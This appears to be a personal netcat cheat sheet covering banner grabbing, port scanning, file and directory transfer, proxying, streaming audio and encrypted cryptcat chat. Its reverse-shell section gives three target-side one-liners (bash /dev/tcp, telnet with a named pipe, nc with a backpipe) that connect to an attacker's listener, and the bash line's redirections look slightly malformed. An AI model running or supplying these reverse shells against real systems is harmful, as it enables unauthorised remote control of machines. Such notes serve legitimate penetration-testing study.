netcat.txt

# Banner grabbing with NETCAT

nc <ip> <OpenPort> ⏎ HTTP/1.1 200 --> basic grab
nc <ip> <OpenPort> ⏎ auto grab other then web port

# port scanning

nc -v -w 1 <ip> -z <port range>
	
	"-w 1" ---> netcat to wait for 1sec for each port
	"-z" ---> 0 input/output mode to speed up the executing process
	"port range" ---> ex: 1-1000 or initPor-endPort

# reverse shell with out netcat

	# linux
		1.
		on target computer : "/bin/bash -i /dev/tcp/<AttackerIP>/<port> 0>&1 2<&1"
		on attacker computer : "nc -l -n -vv -p <port>"

		2. with telnet and backpipe
		on target computer : "mknod backpipe p && telnet <attackerIp> <port> 0<backpipe | /bin/bash 1>backpipe"
		on attacker computer : "nc -l -n -vv -p <port>"

		3. with only backpipe
		on target computer: "mknod /tmp/backpipe p; /bin/bash 0</tmp/backpipe | nc -l -p <port> 1>/tmp/backpipe"
		on attacker computer: nc <targetIp> <port>


# play music over netcat 

mp3 computer : "cat <mp3 file> | nc <speakerIp> <port>"
speaker computer : "nc -lp <port> | mpg123 -"


# file transfer

receiver : nc -vn -lp <port> > <fileName>
sender : nc -vn <receiveIp> <port> < <fileName>

# more simple way to transfer single file

sender: "cat <file> | nc -l -p <port>"
receiver: "nc <senderIp> <port> > <file>"

# transfer whole directory

sender: "tar -cf - <folderName> | nc -l -p <port>"
receiver: "nc <senderIp> <port> | tar -xf -"

# netcat as proxy

nc -l -p <port> | nc www.google.com 80 | nc -l -p <anotherPort>



#######################################################

# cryptcat - same as netcat but with encryption with symmetric algorithm 
# install with  # sudo apt-get install cryptcat

# for simple chat 

on host: "cryptcat -k <password> <ipOfOther> <port>"
on client: "cryptcat -k <password> -l -p <port>"